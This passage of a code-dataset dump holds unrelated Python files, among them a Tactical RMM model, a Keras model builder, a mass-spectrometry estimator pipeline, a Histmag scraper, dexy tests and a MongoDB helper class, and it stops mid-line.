{self.agent.hostname} \"\n \"within the expected time.\"\n ),\n )\n\n def send_recovery_email(self):\n from core.models import CoreSettings\n\n CORE = CoreSettings.objects.first()\n CORE.send_mail(\n f\"{self.agent.client}, {self.agent.site}, {self.agent.hostname} - data received\",\n (\n f\"Data has been received from client {self.agent.client}, \"\n f\"site {self.agent.site}, \"\n f\"agent {self.agent.hostname} \"\n \"after an interruption in data transmission.\"\n ),\n )\n\n def __str__(self):\n return 
self.agent.hostname\n","sub_path":"api/tacticalrmm/agents/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"264996866","text":"from yaml_creator.models.ModelDescriptor import ModelDescriptor,default_model_descriptor_folder_name\nfrom django.shortcuts import render\nfrom ..helpers import dataDirPath\n\ndef data_base_index(request):\n # at the moment we do not use the database\n # folder_names=[md.filename for\n # ModelDescriptor.objects.order_by('-pub_date')]\n # but scan the datadirectory\n \n folder_names = [str(p.stem) for p in\n dataDirPath.iterdir()] if dataDirPath.exists() else []\n\n context={\n 'folder_names':folder_names,\n 'default_folder_name':default_model_descriptor_folder_name()}\n print('######################')\n print(context)\n print('######################')\n \n return render(request,'yaml_creator/data_base_index.html',context)\n","sub_path":"mysite/yaml_creator/views/data_base_index.py","file_name":"data_base_index.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652845543","text":"\n#keras imports\nfrom keras.models import model_from_json\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD , Adam\n\nfrom Config import *\nimport os\n\n\ndef buildmodel():\n print(\"Now we build the model\")\n model = Sequential()\n model.add(Conv2D(32, (8, 8), padding='same',strides=(4, 4),input_shape=(img_cols,img_rows,img_channels))) #80*80*4\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Conv2D(64, (4, 4),strides=(2, 2), padding='same'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Conv2D(128, (3, 3),strides=(1, 1), padding='same'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dense(384))\n model.add(Activation('relu'))\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dense(ACTIONS))\n adam = Adam(lr=LEARNING_RATE)\n model.compile(loss='mse',optimizer=adam)\n \n #create model file if not present\n if not os.path.isfile(loss_file_path):\n model.save_weights('model.h5')\n print(\"We finish building the model\")\n return model","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5609423","text":"import json \nimport os \nimport sys, getopt\nfrom datetime import datetime \nfrom feeder import *\n\nconfig = {\"input\":\"omd\",\"output\":\"glm\",\"type\":[]}\n\ndef help():\n print('Syntax:')\n print('omd2glm.py -i|--ifile [,[,...]] -o|--ofile ')\n print(' -c|--config : [OPTIONAL] output converter configuration')\n print(' -i|--ifile : [REQUIRED] omd input file name.')\n print(' -o|--ofile : [REQUIRED] glm output file name.')\n\ninput_file = None\noutput_file = None\noutput_type = None\n\nopts, args = getopt.getopt(sys.argv[1:],\"hci:o:\",[\"help\",\"config\",\"ifile=\",\"ofile=\"])\n\nif not opts : \n help()\n sys.exit(1)\nfor opt, arg in opts:\n if opt in (\"-h\",\"--help\"):\n help()\n sys.exit(0)\n elif opt in (\"-c\",\"--config\"):\n print(json.dumps(config))\n 
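# '-c' only reports the converter's default I/O settings (the 'config'\n        # dict defined above, i.e. omd in, glm out) as JSON, then exits\n        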
sys.exit(0)\n    elif opt in (\"-i\", \"--ifile\"):\n        input_file = arg.strip()\n    elif opt in (\"-o\", \"--ofile\"):\n        output_file = arg.strip()\n    else:\n        raise Exception(f\"'{opt}' is an invalid command line option\")\n\nomdToGlm(input_file,output_file)","sub_path":"converters/omd2glm.py","file_name":"omd2glm.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"321290461","text":"from itm import ITM\n\nclass Sim_Com(ITM):\n    def __init__(self, k, bits, crupt, sid, pid, channels, pump, poly, importargs):\n        self.crupt = crupt\n        self.ssid = sid[0]\n        self.committer = sid[1]\n        self.receiver = sid[2]\n        self.table = {}\n        self.revtable = {}\n\n        self.receiver_random = None\n        self.receiver_state = 1\n\n        handlers = {\n            channels['p2a'] : self.party_msg,\n            channels['f2a'] : self.func_msg,\n            channels['z2a'] : self.env_msg,\n        }\n\n        ITM.__init__(self, k, bits, sid, pid, channels, handlers, poly, pump, importargs)\n\n    def is_dishonest(self, sid, pid):\n        return (sid,pid) in self.crupt\n\n    def is_honest(self, sid, pid):\n        return not self.is_dishonest(sid,pid)\n\n    def hash(self, s):\n        if s not in self.table:\n            self.table[s] = self.sample(self.k)\n            self.revtable[self.table[s]] = s\n        return self.table[s]\n\n    def env_msg(self, m):\n        msg = m.msg\n        imp = m.imp\n        if msg[0] == 'A2F':\n            t,msg,iprime = msg\n            if msg[0] == 'ro':\n                self.write('a2f', ('ro', self.hash(msg[1])))\n            else:\n                self.pump.write('')\n        #elif isdishonest(self.sid, self.committer):\n        elif self.is_dishonest(self.sid, self.committer):\n            if msg[0] == 'A2P':\n                _,to,msg = msg\n                assert to == (self.sid, self.committer)\n                if msg[0] == 'commit':\n                    # env gives some hash value\n                    if msg[1] in self.revtable:\n                        self.write('a2p', (to, ('commit', self.revtable[msg[1]])))\n                    else:\n                        b = self.sample(1)\n                        self.write('a2p', (to, ('commit', b)))\n                else: \n                    self.pump.write('')\n            else:\n                self.pump.write('')\n        else:\n            self.pump.write('')\n\n    def party_msg(self, m):\n        msg = m.msg\n        imp = m.imp\n        fro,msg = msg\n        print('adv party message', m)\n        if self.is_dishonest(self.sid, self.receiver) and fro == (self.sid, self.receiver):\n            if msg == 'commit' and self.receiver_state == 1:\n                self.receiver_random = self.sample(self.k)\n                #self.write('a2z', ('P2A', (fro, ((self.sid, 'F_ro'),('send', self.receiver_random)))))\n                self.write('a2z', ('P2A', (fro, ('send', self.receiver_random))))\n                self.receiver_state = 2\n            elif msg[0] == 'open' and self.receiver_state == 2 :\n                bit = msg[1]\n                #self.write('a2z', ('P2A', (fro, ((self.sid,'F_ro'),('send', (self.sample(self.k), bit))))))\n                self.write('a2z', ('P2A', (fro, ('send', (self.sample(self.k), bit)))))\n                self.receiver_state = 3\n            else:\n                self.pump.write('')\n        else:\n            self.pump.write('')\n\n    def func_msg(self, m):\n        self.pump.write('')\n","sub_path":"apps/commitment/sim_com.py","file_name":"sim_com.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"357651979","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport pickle\nimport os\nimport shutil\nimport time\nimport argparse\nimport peakutils\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import train_test_split\nimport configparser\nfrom configparser import ExtendedInterpolation\n\n\ndef generate_estimator(X_train, X_test, y_train, y_test):\n    if args.search_for_new_model_parameters:\n        # do a randomised search to find the best 
regressor dimensions\n print('setting up randomised search')\n parameter_search_space = {\n \"loss\": ['ls','lad','huber'],\n \"learning_rate\": [0.01, 0.05, 0.1, 0.2],\n 'n_estimators': range(20,510,10),\n 'max_depth':range(5,30,2), \n 'min_samples_split':range(100,1001,100),\n 'subsample':list(np.arange(0.2,0.9,0.1)),\n 'min_samples_leaf':range(10,71,10),\n 'max_features':[\"log2\", \"sqrt\"],\n }\n # cross-validation splitting strategy uses 'cv' folds in a (Stratified)KFold\n rsearch = RandomizedSearchCV(GradientBoostingRegressor(), parameter_search_space, n_iter=100, n_jobs=-1, random_state=10, cv=5, scoring='r2', verbose=1) # All scorer objects follow the convention that higher return values are better than lower return values, so we want the negated version for error metrics\n print('fitting to the training set')\n # find the best fit within the parameter search space\n rsearch.fit(X_train, y_train)\n best_estimator = rsearch.best_estimator_\n print('best score from the search: {}'.format(round(rsearch.best_score_, 4)))\n best_params = rsearch.best_params_\n print(best_params)\n else:\n print('fitting the estimator to the training data')\n # use the model parameters we found previously\n best_params = {'subsample': 0.6, 'n_estimators': 280, 'min_samples_split': 400, 'min_samples_leaf': 10, 'max_features': 'log2', 'max_depth': 11, 'loss': 'lad', 'learning_rate': 0.05}\n best_estimator = GradientBoostingRegressor(**best_params)\n best_estimator.fit(X_train, y_train) # find the best fit within the parameter search space\n\n # calculate the estimator's score on the train and test sets\n print('evaluating against the training and test set')\n y_train_pred = best_estimator.predict(X_train)\n y_test_pred = best_estimator.predict(X_test)\n print(\"mean absolute error for training set: {}, test set: {}\".format(round(np.abs(y_train-y_train_pred).mean(),4), round(np.abs(y_test-y_test_pred).mean(),4)))\n return best_estimator\n\n\n####################################################################\n\n# This program uses the sequence library to build estimation models to estimate where in each run the library sequence should be.\n\nparser = argparse.ArgumentParser(description='Using the library sequences, build run-specific coordinate estimators for the sequence-charges identified in the experiment.')\nparser.add_argument('-eb','--experiment_base_dir', type=str, default='./experiments', help='Path to the experiments directory.', required=False)\nparser.add_argument('-en','--experiment_name', type=str, help='Name of the experiment.', required=True)\nparser.add_argument('-ini','--ini_file', type=str, default='./tfde/pipeline/pasef-process-short-gradient.ini', help='Path to the config file.', required=False)\nparser.add_argument('-snmp','--search_for_new_model_parameters', action='store_true', help='Search for new model parameters.')\nparser.add_argument('-pdm','--precursor_definition_method', type=str, choices=['pasef','3did','mq'], default='pasef', help='The method used to define the precursor cuboids.', required=False)\nargs = parser.parse_args()\n\n# Print the arguments for the log\ninfo = []\nfor arg in vars(args):\n info.append((arg, getattr(args, arg)))\nprint(info)\n\n# check the experiment directory exists\nEXPERIMENT_DIR = \"{}/{}\".format(args.experiment_base_dir, args.experiment_name)\nif not os.path.exists(EXPERIMENT_DIR):\n print(\"The experiment directory is required but doesn't exist: {}\".format(EXPERIMENT_DIR))\n sys.exit(1)\n\n# load the sequence library\nSEQUENCE_LIBRARY_DIR = 
\"{}/sequence-library-{}\".format(EXPERIMENT_DIR, args.precursor_definition_method)\nSEQUENCE_LIBRARY_FILE_NAME = \"{}/sequence-library.feather\".format(SEQUENCE_LIBRARY_DIR)\nif not os.path.isfile(SEQUENCE_LIBRARY_FILE_NAME):\n print(\"The sequences library file doesn't exist: {}\".format(SEQUENCE_LIBRARY_FILE_NAME))\n sys.exit(1)\n\n# load the sequence library\nlibrary_sequences_df = pd.read_feather(SEQUENCE_LIBRARY_FILE_NAME)\nprint('loaded {} sequences from the library {}'.format(len(library_sequences_df), SEQUENCE_LIBRARY_FILE_NAME))\n\n# load the indentifications from each run\nIDENTIFICATIONS_DIR = '{}/identifications-pasef'.format(EXPERIMENT_DIR)\nIDENTIFICATIONS_FILE = '{}/exp-{}-identifications-pasef-recalibrated.feather'.format(IDENTIFICATIONS_DIR, args.experiment_name)\nif not os.path.isfile(IDENTIFICATIONS_FILE):\n print(\"The identifications file doesn't exist: {}\".format(IDENTIFICATIONS_FILE))\n sys.exit(1)\n\n# load the experiment identifications\nidentifications_df = pd.read_feather(IDENTIFICATIONS_FILE)\nprint('loaded {} identifications from {}'.format(len(identifications_df), IDENTIFICATIONS_FILE))\nidentifications_df['human'] = identifications_df['protein id'].str.contains('HUMAN')\n\n# set up the coordinate estimators directory\nCOORDINATE_ESTIMATORS_DIR = \"{}/coordinate-estimators\".format(EXPERIMENT_DIR)\nif os.path.exists(COORDINATE_ESTIMATORS_DIR):\n shutil.rmtree(COORDINATE_ESTIMATORS_DIR)\nos.makedirs(COORDINATE_ESTIMATORS_DIR)\nprint(\"The coordinate estimators directory was created: {}\".format(COORDINATE_ESTIMATORS_DIR))\n\n# outputs\nRUN_SEQUENCES_FILE_NAME = \"{}/run-sequence-attribs.feather\".format(COORDINATE_ESTIMATORS_DIR)\nMERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME = \"{}/merged-run-library-sequence-attribs.feather\".format(COORDINATE_ESTIMATORS_DIR)\n\n# check the INI file exists\nif not os.path.isfile(args.ini_file):\n print(\"The configuration file doesn't exist: {}\".format(args.ini_file))\n sys.exit(1)\n\n# load the INI file\ncfg = configparser.ConfigParser(interpolation=ExtendedInterpolation())\ncfg.read(args.ini_file)\n\n# set up constants\nMINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING = cfg.getfloat('extraction','MINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING')\n\nstart_run = time.time()\n\n# for each run, find the mz, scan, RT, and intensity for each sequence-charge identified\nrun_sequences_l = []\nfor group_name,group_df in identifications_df.groupby(['run_name','sequence','charge'], as_index=False):\n run_name = group_name[0]\n sequence = group_name[1]\n charge = group_name[2]\n run_mz_mean = peakutils.centroid(group_df.recalibrated_monoisotopic_mz, group_df.feature_intensity)\n run_mz_std_dev = np.std(group_df.recalibrated_monoisotopic_mz)\n run_scan_mean = np.mean(group_df.scan_apex)\n run_scan_std_dev = np.std(group_df.scan_apex)\n run_rt_mean = np.mean(group_df.rt_apex)\n run_rt_std_dev = np.std(group_df.rt_apex)\n run_intensity_mean = np.mean(group_df.feature_intensity)\n run_intensity_std_dev = np.std(group_df.feature_intensity)\n run_sequences_l.append((run_name,sequence,charge,run_mz_mean,run_scan_mean,run_rt_mean,run_mz_std_dev,run_scan_std_dev,run_rt_std_dev,run_intensity_mean,run_intensity_std_dev))\n\nrun_sequences_df = pd.DataFrame(run_sequences_l, columns=['run_name','sequence','charge','run_mz','run_scan','run_rt','run_mz_std_dev','run_scan_std_dev','run_rt_std_dev','run_intensity','run_intensity_std_dev'])\n\n# calculate the coefficients of variance\nrun_sequences_df['cv_mz'] = 
run_sequences_df.run_mz_std_dev / run_sequences_df.run_mz\nrun_sequences_df['cv_scan'] = run_sequences_df.run_scan_std_dev / run_sequences_df.run_scan\nrun_sequences_df['cv_rt'] = run_sequences_df.run_rt_std_dev / run_sequences_df.run_rt\nrun_sequences_df['cv_intensity'] = run_sequences_df.run_intensity_std_dev / run_sequences_df.run_intensity\n\nrun_sequences_df.to_feather(RUN_SEQUENCES_FILE_NAME)\n\n# merge the sequence-charges for each run with their library counterparts\nmerged_df = pd.merge(run_sequences_df, library_sequences_df, how='left', left_on=['sequence','charge'], right_on=['sequence','charge'])\n\n# for each run-sequence-charge, calculate the delta from the library\nmerged_df['delta_mz'] = merged_df.run_mz - merged_df.theoretical_mz\nmerged_df['delta_mz_ppm'] = (merged_df.run_mz - merged_df.theoretical_mz) / merged_df.theoretical_mz * 1e6\nmerged_df['delta_scan'] = (merged_df.run_scan - merged_df.experiment_scan_mean) / merged_df.experiment_scan_mean\nmerged_df['delta_rt'] = (merged_df.run_rt - merged_df.experiment_rt_mean) / merged_df.experiment_rt_mean\n\nmerged_df.drop(['run_mz_std_dev','run_scan_std_dev','run_rt_std_dev','run_intensity_std_dev'], axis=1, inplace=True)\nprint(\"writing {} merged run-library sequence attributes to {}\".format(len(merged_df), MERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME))\nmerged_df.to_feather(MERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME)\n\n# create an estimator for each run in the experiment\nrun_names_l = list(identifications_df.run_name.unique())\nfor run_name in run_names_l:\n print(\"building the coordinate estimators for run {}\".format(run_name))\n estimator_training_set_df = merged_df[(merged_df.run_name == run_name) & (merged_df.number_of_runs_identified > round(len(run_names_l) * MINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING))]\n\n # X is the same for all the estimators\n # filter out rows not to be used in this training set\n X = estimator_training_set_df[['theoretical_mz','experiment_rt_mean','experiment_rt_std_dev','experiment_scan_mean','experiment_scan_std_dev','experiment_intensity_mean','experiment_intensity_std_dev']].values\n y = estimator_training_set_df[['delta_mz_ppm','delta_scan','delta_rt','run_mz','run_scan','run_rt']].values\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.02)\n print('there are {} examples in the training set, {} in the test set'.format(len(X_train), len(X_test)))\n\n # save the test set so we can evaluate performance\n np.save('{}/run-{}-X_test.npy'.format(COORDINATE_ESTIMATORS_DIR, run_name), X_test)\n np.save('{}/run-{}-y_test.npy'.format(COORDINATE_ESTIMATORS_DIR, run_name), y_test)\n\n # build the m/z delta estimation model - estimate the m/z delta ppm as a proportion of the experiment-wide value\n print('training the m/z model')\n mz_estimator = generate_estimator(X_train, X_test, y_train[:,0], y_test[:,0])\n\n # save the trained m/z model\n ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'mz')\n with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n pickle.dump(mz_estimator, file)\n\n # build the scan estimation model - estimate the delta scan as a proportion of the experiment-wide value\n print('training the scan model')\n scan_estimator = generate_estimator(X_train, X_test, y_train[:,1], y_test[:,1])\n\n # save the trained scan model\n ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'scan')\n with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n 
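# the pickled estimator can be restored later with the standard library,\n        # e.g. pickle.load(open(ESTIMATOR_MODEL_FILE_NAME, 'rb')), which yields\n        # the fitted GradientBoostingRegressor ready for .predict()\n        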
pickle.dump(scan_estimator, file)\n\n    # RT estimation model - estimate the RT delta as a proportion of the experiment-wide value\n    print('training the RT model')\n    rt_estimator = generate_estimator(X_train, X_test, y_train[:,2], y_test[:,2])\n\n    # save the trained RT model\n    ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'rt')\n    with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n        pickle.dump(rt_estimator, file)\n    \n    print()\n\nstop_run = time.time()\nprint(\"total running time ({}): {} seconds\".format(parser.prog, round(stop_run-start_run,1)))\n","sub_path":"pipeline/build-run-coordinate-estimators.py","file_name":"build-run-coordinate-estimators.py","file_ext":"py","file_size_in_byte":11925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"314927967","text":"import json\nfrom gtts import gTTS\n\n\ndef converter():\n    with open(\"files/news_data.csv\", \"r\") as file:\n        news_data = file.read()\n\n    news_data = json.loads(news_data)\n    text = \"\"\n\n    for i, j in news_data.items():\n        text += \"Next Next Next \" + str(i)\n\n    speech = gTTS(text=text, lang=\"en\", slow=False)\n    with open('files/test.mp3', 'wb') as f:\n        speech.write_to_fp(f)\n    print(\"Audio created successfully\")\n\n","sub_path":"helpers/text_audio_converter.py","file_name":"text_audio_converter.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"222367844","text":"from dexy.doc import Doc\nfrom dexy.params import RunParams\nfrom dexy.runner import Runner\nfrom dexy.tests.utils import tempdir\nfrom ordereddict import OrderedDict\nimport os\n\ndef test_runner_init():\n    runner = Runner()\n    assert isinstance(runner.params, RunParams)\n    assert isinstance(runner.registered, list)\n    assert runner.params.artifacts_dir == 'artifacts'\n\ndef test_runner_setup():\n    with tempdir():\n        assert not os.path.exists('artifacts')\n        runner = Runner()\n        runner.setup_dexy_dirs()\n        assert os.path.exists('artifacts')\n\ndef test_runner_run():\n    with tempdir():\n        runner = Runner()\n        runner.setup_dexy_dirs()\n        d1 = Doc(\"abc.txt|outputabc\", contents=\"these are the contents\", runner=runner)\n        d2 = Doc(\"hello.txt|outputabc\", contents=\"these are more contents\", runner=runner)\n        assert d1.state == 'setup'\n        assert d2.state == 'setup'\n        runner.docs = [d1, d2]\n        runner.run()\n        assert d1.state == 'complete'\n        assert d2.state == 'complete'\n\ndef test_runner_register():\n    with tempdir():\n        doc = Doc(\"abc.txt\")\n        runner = Runner()\n        runner.setup_dexy_dirs()\n        runner.register(doc)\n        assert doc in runner.registered\n","sub_path":"dexy/tests/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"321810022","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# python 3.6.4\n\n#import pygame\n#import OpenGL\n#import kivy\nimport sys\nimport json\nimport menus\n\n#random.seed(1)\n\ndef sortWordsByLength(allWords):\n\twordsLenDict = {}\n\tfor word in allWords:\n\t\ttry:\n\t\t\twordsLenDict[len(word)].append(word)\n\t\texcept KeyError:\n\t\t\twordsLenDict[len(word)] = [word]\n\twith open('wordsLen.ini','w') as 
file:\n\t\tjson.dump(wordsLenDict,file)\n\treturn\n\nmenus.mainMenu()\n\nsys.exit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624169976","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom mobify.source import MultiPageSource, MobifySource\n\n\nclass HistmagSource(MultiPageSource):\n @staticmethod\n def is_my_url(url):\n return '//histmag.org/' in url\n\n @staticmethod\n def extend_url(url):\n url = url.split('?')[0]\n return url\n\n def get_pages(self):\n url = self.extend_url(self._url)\n\n # https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947/3\n try:\n last_page_link = self.tree.xpath('//div[@class=\"paginator\"][1]//a')[-1].attrib.get('href')\n last_page_no = int(last_page_link.split('/')[-1]) # 3\n except IndexError:\n last_page_no = 1\n\n pages = ['{}/{}'.format(url, page) for page in range(1, last_page_no+1)]\n\n self._logger.info('Chapters: {}'.format(pages))\n\n return [HistmagPage(url=page) for page in pages]\n\n\nclass HistmagPage(MobifySource):\n\n HEADER = u\"\"\"\n
<h1>{title}</h1>\n<p><em>{lead}</em></p>\n<p><strong>{author}</strong></p>
\n\"\"\"\n\n FOOTER = u\"\"\"\n
<br>\n<hr>\n<p><em>Wolna licencja – ten materiał został opublikowany na licencji Creative Commons Uznanie autorstwa\nNa tych samych warunkach 3.0 Polska.</em></p>\n\n<p><em>Redakcja i autor zezwalają na jego dowolny przedruk i wykorzystanie (również w celach komercyjnych) pod\nnastępującymi warunkami: należy wyraźnie wskazać autora materiału oraz miejsce pierwotnej publikacji –\nPortal historyczny Histmag.org, a także nazwę licencji (CC BY-SA 3.0) wraz z odnośnikiem do jej postanowień.\nW przypadku przedruku w internecie konieczne jest także zamieszczenie dokładnego aktywnego\nodnośnika do materiału objętego licencją.</em></p>\n\n<p><strong>Źródło: {url}</strong></p>
\n \"\"\"\n\n @staticmethod\n def is_my_url(url):\n \"\"\"\n This source cannot be created directly from Publisher\n \"\"\"\n raise NotImplementedError\n\n def get_inner_html(self):\n article = self.xpath('//*[@class=\"middle\"]')\n\n # clean up the HTML\n xpaths = [\n 'table',\n 'div[@class=\"paginator\"]',\n 'h4', # Zobacz także\n '*//span/a[img]', # big pictures\n '*//span/img', # inline pictures\n 'img',\n 'div[@class=\"snippet\"]', # reklamy\n 'h3[contains(text(), \"Tekst jest fragmentem\")]', # fragmenty książek\n ]\n article = self.remove_nodes(article, xpaths)\n\n html = self.get_node_html(article)\n\n # tags cleanup\n html = re.sub(r'
<br ?/?>', '', html)\n        html = re.sub(r'<p>\s*</p>
', '', html)\n        html = re.sub(r'<span[^>]*>', '', html)\n\n        return html\n\n    def get_html(self):\n        # add a title and a footer\n        return '\\n'.join([\n            self.HEADER.format(title=self.get_title(), author=self.get_author(), lead=self.get_lead()).strip(),\n            self.get_inner_html(),\n            self.FOOTER.format(url=self._url).strip()\n        ]).strip()\n\n    def get_title(self):\n        # 
<p>Maurycy Beniowski - bunt na Kamczatce</p>
\n return self.get_node('//div[contains(@class, \"article_panel\")]//p[1]').strip()\n\n def get_lead(self):\n #
<p>Po upadku konfederacji ...</p>
\n lead = self.get_node('//div[contains(@class, \"article_panel\")]//p[2]')\n\n return lead.strip() if lead else ''\n\n def get_author(self):\n return self.get_node('//*[contains(@class, \"author_name\")]//a/text()[2]').strip()\n\n def get_language(self):\n return 'pl'\n","sub_path":"mobify/sources/histmag.py","file_name":"histmag.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228821383","text":"#This file implements the data structures and methods of TensorLayerModify using MongoDB\r\n#It has the power to create, add and remove from MainCollection, Main Attributes Array, Attribute Notes Array,\r\n#note that there are no real arrays here; it's just a generic name for API purposes\r\nimport pymongo, datetime, itertools\r\nfrom bson.objectid import ObjectId\r\n\r\nclass TensorLayerModify:\r\n\tdef __init__(self, serverLocation='localhost', port=27017, database=None, test=False):\r\n\t\tself.test = test\r\n\t\tself.client = pymongo.MongoClient(serverLocation, port)\r\n\t\tif database is None:\r\n\t\t\tself.db = self.client['test_database']\r\n\t\t\t#Set up a brand new database. Must set mainCollection; mainAttrCollection; mainAttrNotesCollection\r\n\t\t\tif not self.createMainCollection():\r\n\t\t\t\traise AttributeError\r\n\t\t\tif not self.createMainAttrArray():\r\n\t\t\t\traise AttributeError\r\n\t\t\tif not self.createAttrNotesArray():\r\n\t\t\t\traise AttributeError\r\n\t\telse:\r\n\t\t\tself.db = self.client[database]\r\n\t\t\tself.mainCollection = self.db['mainCollection']\r\n\t\t\tself.mainAttrCollection = self.db['mainAttrCollection']\r\n\t\t\tself.mainAttrNotesCollection = self.db['mainAttrNotesCollection']\r\n\t\r\n\t#Create the Main Collection in a TensorLayer\r\n\tdef createMainCollection(self):\r\n\t\tif 'mainCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t\r\n\t\t#will become the mainCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t\"_id\": ObjectId(b\"headDoc00000\"),\r\n\t\t\t\"Creation DateTime\": str(datetime.datetime.utcnow()),\r\n\t\t\t\"attrArrayIndexMax\": -1\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainCollection')\r\n\t\treturn True\r\n\t\t\r\n\t#Delete a Collection, and return True if collection doesn't exist\r\n\tdef deleteMainCollection(self):\r\n\t\tif 'mainCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\t#Add an element to the Main Collection in a TensorLayer\r\n\t#Also adds the appropriate entry to the MainAttrArray \r\n\t#tensor must be an array of values convertable to int.\r\n\tdef addToTensorLayer(self, tensor):\r\n\t\tintTensor = []\r\n\t\ttry:\r\n\t\t\tfor c in tensor:\r\n\t\t\t\tintTensor.append( int(c) )\r\n\t\texcept:\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Get the information for creating a new Document\r\n\t\tupdateStatus = 
self.db.mainCollection.find_one_and_update( \r\n\t\t\t{\"_id\": ObjectId(b\"headDoc00000\")}, {\"$inc\": {\"attrArrayIndexMax\": 1}}, return_document = pymongo.collection.ReturnDocument.AFTER\r\n\t\t)\r\n\t\tattrArrayIndex = updateStatus['attrArrayIndexMax']\r\n\t\t\r\n\t\t#Create the new Document\r\n\t\tdoc = {\r\n\t\t\t\"tensor\": intTensor,\r\n\t\t\t\"attributes\": attrArrayIndex, #is really just a pointer to the attrArrayIndex\r\n\t\t\t\"quickLinks\": intTensor\r\n\t\t}\r\n\t\t\r\n\t\t#create main attribute array entry\r\n\t\tif not self.addToMainAttrArray(attrArrayIndex):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\t#Append the new Document to the mainCollection\r\n\t\tself.db.mainCollection.insert_one(doc)\r\n\t\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Main Collection in a TensorLayer\r\n\tdef removeFromTensorLayer(self, tensor):\r\n\t\t#Acts like delete_many but I also removeFromMainAttrArray\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\t#remove entry. Note that no ID is known so we just kinda guess\r\n\t\t\t\tdeleteResult = self.db.mainCollection.find_one_and_delete( {\"tensor\": tensor} )\r\n\t\t\t\tif deleteResult is None:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tattrArrayIndex = deleteResult['attributes']\r\n\t\t\t\t\r\n\t\t\t\t#update main attribute array. Continue unconditionally since ptrs are gone anyway\r\n\t\t\t\tself.removeFromMainAttrArray(attrArrayIndex)\r\n\t\t\texcept:\r\n\t\t\t\traise\r\n\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#Create a valid Main Attributes Array ObjectId\r\n\t#These objects are not unique unless attrArrayIndex is unique. BE CAREFUL!\r\n\tdef mainAttrArrayObjectId(self, attrArrayIndex):\r\n\t\tunbuffedString = str(attrArrayIndex)\r\n\t\tbuffedString = 